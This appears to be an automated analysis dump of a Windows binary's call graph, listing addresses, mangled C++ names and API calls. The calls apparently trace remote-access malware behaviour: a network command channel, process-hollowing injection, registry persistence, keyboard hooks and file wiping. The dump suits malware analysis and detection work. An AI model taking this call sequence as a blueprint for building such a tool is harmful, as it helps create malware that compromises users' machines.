FindClose ExitThread 16769->16772 16771 404804 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16770->16771 16773 404840 ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16771->16773 16774 404825 _CxxThrowException 16771->16774 17006 40504f 16773->17006 16774->16773 16777 4048ed FindNextFileW 16780 404b32 FindClose ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16777->16780 16781 404905 16777->16781 16778 4048af ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16779 402440 21 API calls 16778->16779 16782 4048cf _CxxThrowException 16779->16782 16785 402440 21 API calls 16780->16785 16783 404912 wcscmp 16781->16783 16784 4049f6 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16781->16784 16788 404a42 ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I 16781->16788 16782->16777 16783->16784 16786 404930 wcscmp 16783->16786 16784->16781 16787 404b6f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16785->16787 16786->16784 16789 404948 7 API calls 16786->16789 16790 404ea7 6 API calls 16787->16790 16791 404b21 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16788->16791 16792 404a65 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16788->16792 17008 404c0a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16789->17008 16794 404b94 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16790->16794 16791->16777 17030 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16792->17030 16794->16656 16797 404ab6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16800 402440 21 API calls 16797->16800 16798 4049ea ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16798->16784 16799 4049cf _CxxThrowException 16799->16798 16801 404ad9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16800->16801 16801->16791 16802 404b06 _CxxThrowException 16801->16802 16802->16791 16804 402038 2 API calls 16803->16804 16805 403bfe 16804->16805 17032 40209b connect 16805->17032 16807 403c13 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16808 4020c2 23 API calls 16807->16808 16809 403c2e 16808->16809 16810 402149 689 API calls 16809->16810 16811 403c3c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16810->16811 16811->16533 16813 404ec7 16812->16813 16814 404f27 16813->16814 16816 404f85 3 API calls 16813->16816 17033 404f85 16813->17033 16814->16656 16817 404ee9 closesocket 16816->16817 16818 404f85 3 API calls 16817->16818 16819 404efd TerminateThread 16818->16819 16819->16813 16820->16553 16822 413413 16821->16822 16823 413526 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16821->16823 16824 4134e5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16822->16824 16825 41341a 16822->16825 16826 40b708 7 API calls 16823->16826 16830 40b708 7 API calls 16824->16830 16827 413421 16825->16827 16828 4134aa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16825->16828 16829 413457 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16826->16829 16831 413424 16827->16831 16832 41346f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16827->16832 16834 40b708 7 API calls 16828->16834 16837 40b708 7 API calls 16829->16837 16830->16829 16835 413577 SystemParametersInfoW 16831->16835 16836 41342b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16831->16836 16838 40b708 7 API calls 16832->16838 16834->16829 16835->16464 16839 40b708 7 API calls 16836->16839 16840 413574 16837->16840 16838->16829 16839->16829 16840->16835 16841->16530 16843 40ebc7 EnumWindows ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16842->16843 16844 40ec0e 16842->16844 16845 4020c2 23 API calls 16843->16845 17038 40ea96 GetWindowTextW IsWindowVisible sprintf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16843->17038 16844->16533 16846 40ebf7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 16845->16846 16846->16844 16848 402038 2 API calls 16847->16848 16849 41053a 16848->16849 17045 40209b connect 16849->17045 16851 41054f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16852 4020c2 23 API calls 16851->16852 16853 41056a 16852->16853 16854 402149 689 API calls 16853->16854 16855 410578 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16854->16855 16855->16533 16857 402038 2 API calls 16856->16857 16858 4019f3 16857->16858 17046 40209b connect 16858->17046 16860 401a08 16861 401a11 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16860->16861 16862 401a27 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16860->16862 16863 401a3b 16861->16863 16862->16863 16864 4020c2 23 API calls 16863->16864 16865 401a42 16864->16865 16866 402149 688 API calls 16865->16866 16867 401a50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16866->16867 16867->16533 16869 40e91a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16868->16869 16870 40e80f 16868->16870 16869->16533 17047 402010 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 16870->17047 16874 40e83c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16875 4020c2 23 API calls 16874->16875 16876 40e85b 16875->16876 17052 41228f GlobalMemoryStatusEx 16876->17052 17053 41230a GetModuleHandleA GetProcAddress 16876->17053 16879 40e86f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16880 4020c2 23 API calls 16879->16880 16881 40e8d9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16880->16881 16881->16876 16882 40e908 16881->16882 17056 402103 closesocket ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16882->17056 16885 40e9b0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16884->16885 17057 412ddf CreateFileW 16885->17057 16888 40e9e3 ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16890 40ea74 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16888->16890 16891 40e9f4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW 16888->16891 16889 40e9db 16889->16885 16889->16888 16890->16533 16892 402010 3 API calls 16891->16892 16893 40ea10 16892->16893 17062 40209b connect 16893->17062 16895 40ea26 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16896 4020c2 23 API calls 16895->16896 16897 40ea5b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16896->16897 17063 4020f4 closesocket 16897->17063 16899 40ea6c 17064 402103 closesocket ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16899->17064 16902 411be4 16901->16902 16910 411be0 16901->16910 16903 402038 2 API calls 16902->16903 16904 411bf0 16903->16904 17065 40209b connect 16904->17065 16906 411c05 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16907 4020c2 23 API calls 16906->16907 16908 411c25 16907->16908 16909 402149 690 API calls 16908->16909 16909->16910 16910->16533 16912 411b70 16911->16912 16913 411b77 16911->16913 16914 411a24 106 API calls 16912->16914 16913->16533 16915 411b75 16914->16915 16915->16533 16917 41358b 48 API calls 16916->16917 16918 411a3b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ PathFileExistsW 16917->16918 16919 411a56 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16918->16919 16920 411ad9 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16918->16920 16922 411abb ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16919->16922 16923 411a6d 16919->16923 17066 411af5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16920->17066 16926 412e4e 7 API calls 16922->16926 16924 411a76 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16923->16924 16925 411a9b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16923->16925 16929 411a94 16924->16929 16925->16929 16927 411ad6 16926->16927 16927->16920 16930 4020c2 23 API calls 16929->16930 16931 411a99 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16930->16931 16931->16656 16933 411b9a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16932->16933 16934 411bbf 16932->16934 16935 4020c2 23 API calls 16933->16935 16934->16533 16936 411bbd 16935->16936 16936->16533 16937->16555 16938->16671 16940 406d71 16939->16940 16941 406d5e UnhookWindowsHookEx TerminateThread 16939->16941 16974 406cff ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16940->16974 16941->16940 16945 412bee 18 API calls 16944->16945 16946 410520 16945->16946 16946->16674 16948 412d44 16947->16948 16949 412c5d wcscpy 16947->16949 16948->16680 16950 412c79 FindNextFileW 16949->16950 16951 412c91 16950->16951 16952 412d1d GetLastError 16950->16952 16951->16950 16953 412d49 FindClose 16951->16953 16955 412d36 FindClose RemoveDirectoryW 16951->16955 16956 412ca6 wcscat 16951->16956 16957 412cf8 SetFileAttributesW 16951->16957 16958 412d0a DeleteFileW 16951->16958 16959 412bee 2 API calls 16951->16959 16960 412cdb wcscpy 16951->16960 16961 412cd2 RemoveDirectoryW 16951->16961 16977 412bba wcscmp 16951->16977 16952->16951 16952->16953 16953->16948 16955->16948 16956->16951 16957->16958 16958->16951 16958->16953 16959->16951 16960->16951 16961->16960 16963 40ba03 16962->16963 16964 40ba07 RegDeleteValueW 16962->16964 16963->16679 16964->16679 16966 412d66 CreateFileW 16965->16966 16968 40895a 16966->16968 16969 412da4 16966->16969 16968->16705 16968->16706 16970 412dba WriteFile 16969->16970 16971 412daa SetFilePointer 16969->16971 16972 412dd2 CloseHandle 16970->16972 16973 412dd0 16970->16973 16971->16970 16971->16972 16972->16968 16973->16972 16975 406d3c 16974->16975 16976 406d2d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RemoveDirectoryW 16974->16976 16975->16672 16976->16975 16978 412bd4 wcscmp 16977->16978 16979 412be4 16977->16979 16978->16979 16979->16951 16982 406e58 16980->16982 16983 406efb 16980->16983 16981 406e83 LoadLibraryA 16981->16982 16981->16983 16982->16981 16982->16983 16984 406ecd GetProcAddress 16982->16984 16983->16718 16984->16982 16984->16983 16986 413edc 16985->16986 16986->16721 16986->16986 16987->16731 16988->16736 16989->16736 16990->16745 16991->16754 16993 40ec90 16992->16993 16996 40ecc1 16993->16996 16995 40ecae 16995->16763 16997 40ece3 16996->16997 17001 40ed70 16996->17001 17002 40ee81 16997->17002 16999 40ed13 17005 4018db ??3@YAXPAX 16999->17005 17001->16995 17003 40eef1 ??2@YAPAXI 17002->17003 17004 40ee8e 17003->17004 17004->16999 17005->17001 17007 404869 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17006->17007 17007->16777 17007->16778 17009 40504f 17008->17009 17010 404c4f ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17009->17010 17011 404e83 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17010->17011 17012 404c93 FindNextFileW 17010->17012 17015 4049cb 17011->17015 17013 404e7a FindClose 17012->17013 17014 404cab 17012->17014 17013->17011 17016 404d64 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17014->17016 17017 404cb8 wcscmp 17014->17017 17020 404d9c ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I 17014->17020 17015->16798 17015->16799 17016->17014 17017->17016 17018 404cd6 wcscmp 17017->17018 17018->17016 17019 404cea 7 API calls 17018->17019 17021 404c0a 24 API calls 17019->17021 17022 404e44 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17020->17022 17023 404dbc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17020->17023 17024 404d5b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17021->17024 17022->17012 17031 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 17023->17031 17024->17016 17026 404e05 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 17027 402440 21 API calls 17026->17027 17028 404e25 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17027->17028 17028->17022 17029 404e52 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17028->17029 17029->17015 17030->16797 17031->17026 17032->16807 17034 404f91 17033->17034 17035 404f9f 17034->17035 17037 40500c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 17034->17037 17035->16813 17043 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 17038->17043 17040 40eafe 17044 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 17040->17044 17042 40eb19 14 API calls 17043->17040 17044->17042 17045->16851 17046->16860 17048 402031 17047->17048 17049 40202a 17047->17049 17051 40209b connect 17048->17051 17050 402038 2 API calls 17049->17050 17050->17048 17051->16874 17052->16876 17054 41233a Sleep 17053->17054 17055 412353 __aulldiv 17054->17055 17055->16879 17056->16869 17058 40e9c3 Sleep ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17057->17058 17059 412e0a GetFileSize ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ReadFile 17057->17059 17058->16888 17058->16889 17060 412e41 CloseHandle 17059->17060 17061 412e3f 17059->17061 17060->17058 17061->17060 17062->16895 17063->16899 17064->16890 17065->16906 17067 41203b 13 API calls 17066->17067 17068 411b27 GetModuleHandleA PlaySoundW Sleep PlaySoundW 17067->17068 17068->16931 17070 405e82 17069->17070 17071 405e78 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 17069->17071 17072 405e88 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD SetEvent 17070->17072 17073 405e9b free ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17070->17073 17071->17070 17072->17073 17073->16361 17075 40b840 RegSetValueExA RegCloseKey 17074->17075 17076 40b86a 17074->17076 17075->16048 17076->16048 17078 407daa 17077->17078 17079 407d6c ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17077->17079 17081 407db0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17078->17081 17082 407dee 17078->17082 17090 40b7b9 RegCreateKeyW 17079->17090 17084 40b7b9 7 API calls 17081->17084 17085 407e32 17082->17085 17086 407df4 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17082->17086 17083 407d9e ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17083->17078 17087 407de2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17084->17087 17085->16059 17088 40b7b9 7 API calls 17086->17088 17087->17082 17089 407e26 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17088->17089 17089->17085 17091 40b7d0 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RegSetValueExW RegCloseKey 17090->17091 17092 40b81c ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17090->17092 17093 40b80b 17091->17093 17094 40b80d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17091->17094 17092->17083 17093->17094 17094->17083 17096 40b522 4 API calls 17095->17096 17097 4032d4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17096->17097 17097->16083 17099 4127d7 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17098->17099 17099->15770 17101 412b6a 17100->17101 17102 412b6f GetModuleFileNameExW 17100->17102 17105 412bab ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 17101->17105 17103 412b89 CloseHandle 17102->17103 17104 412b9a CloseHandle 17102->17104 17103->17101 17104->17105 17105->16159 17107 412b21 OpenProcess 17106->17107 17108 409b9f 17106->17108 17107->17108 17108->16168 17108->16174 17117 40b5a2 RegOpenKeyExW 17109->17117 17111 412203 ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 17121 41290a ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI 17111->17121 17113 41225e ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17113->16142 17125 40f219 _EH_prolog GetModuleHandleA GetProcAddress 17114->17125 17118 40b5cd RegQueryValueExW RegCloseKey 17117->17118 17119 40b5fe 17117->17119 17120 40b607 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 17118->17120 17119->17120 17120->17111 17122 412965 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 17121->17122 17123 41292a ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17121->17123 17124 412972 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17122->17124 17123->17124 17124->17113 17126 40f25b 17125->17126 17127 409cba 17125->17127 17126->17127 17128 40f26f CreateProcessW 17126->17128 17127->16165 17127->16166 17128->17127 17129 40f2a2 VirtualAlloc GetThreadContext 17128->17129 17129->17127 17130 40f2cf ReadProcessMemory 17129->17130 17130->17127 17131 40f2f1 VirtualAllocEx 17130->17131 17131->17127 17133 40f31f WriteProcessMemory 17131->17133 17133->17127 17134 40f33a 17133->17134 17135 40f347 WriteProcessMemory 17134->17135 17136 40f37b WriteProcessMemory 17134->17136 17135->17134 17136->17127 17137 40f398 SetThreadContext 17136->17137 17137->17127 17138 40f3b5 ResumeThread 17137->17138 17138->17127 17140 40516e 17139->17140 17140->16190 17140->16191 17142 409d54 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17141->17142 17143 40b4c8 3 API calls 17142->17143 17144 409d70 17143->17144 17145 409d8a ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 17144->17145 17147 409e05 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 17144->17147 17150 409df5 Sleep 17144->17150 17158 409d83 17144->17158 17146 412795 7 API calls 17145->17146 17148 409daf ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17146->17148 17149 412795 7 API calls 17147->17149 17152 40b7b9 7 API calls 17148->17152 17153 409e2a ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17149->17153 17150->17142 17154 409dc0 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17152->17154 17155 40b7b9 7 API calls 17153->17155 17156 40b708 7 API calls 17154->17156 17157 409e3b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17155->17157 17156->17158 17159 40b708 7 API calls 17157->17159 17158->17150 17163 408245 17158->17163 17160 409e6d 17159->17160 17201 40ac8c TerminateProcess WaitForSingleObject 17160->17201 17162 409e75 exit 17202 40ac8c TerminateProcess WaitForSingleObject 17163->17202 17165 408253 17166 408266 17165->17166 17168 406d41 8 API calls 17165->17168 17167 408274 17166->17167 17169 41050f 19 API calls 17166->17169 17170 40827d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17167->17170 17171 40828e 17167->17171 17168->17166 17169->17167 17172 412bee 18 API calls 17170->17172 17173 4082aa ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17171->17173 17177 4082ba 17171->17177 17172->17171 17174 40b9e8 2 API calls 17173->17174 17174->17177 17175 4082c6 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17178 40b9e8 2 API calls 17175->17178 17176 4082da 17179 408301 